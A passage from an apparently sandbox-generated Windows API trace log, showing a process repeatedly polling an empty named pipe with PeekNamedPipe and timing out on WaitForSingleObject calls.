lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.556] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.587] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.587] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.619] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.619] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.649] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.649] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.878] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.879] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.899] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.900] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.931] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.931] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.962] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.963] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.179] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.179] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.195] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.195] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.239] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.239] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.258] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.258] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.290] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.290] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.321] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.321] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.352] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.352] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.382] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.382] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.431] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.431] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.460] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.460] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.497] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.497] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.523] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.523] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.555] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.555] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.585] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.585] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.617] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.617] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.648] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.648] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.680] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.680] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.713] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.713] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.742] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.742] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.772] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.772] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.805] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.805] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.835] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.835] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.867] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.867] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.897] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.897] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0107.929] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.929] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0108.839] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0108.839] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0109.073] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0109.074] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0109.315] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0109.315] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0109.334] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0109.334] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0109.364] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0109.364] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0110.042] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0110.042] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0110.122] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0110.122] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0110.252] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0110.252] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0110.277] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0110.278] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0110.364] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0110.364] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0110.394] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0110.394] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0110.439] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0110.440] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0110.750] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0110.750] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0110.996] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0110.996] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0111.017] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.017] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0111.048] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.049] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0111.103] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.103] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0111.160] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.160] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0111.558] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.787] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0111.904] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.904] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0111.923] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.924] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0112.431] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0112.431] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0112.453] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0112.453] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0112.484] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0112.484] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0112.519] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0112.519] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.248] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.248] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.281] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.281] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.311] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.311] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.343] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.343] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.374] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.374] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.405] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.405] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.435] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.435] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.468] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.468] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.498] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.498] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.530] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.530] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.560] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.560] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.593] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, 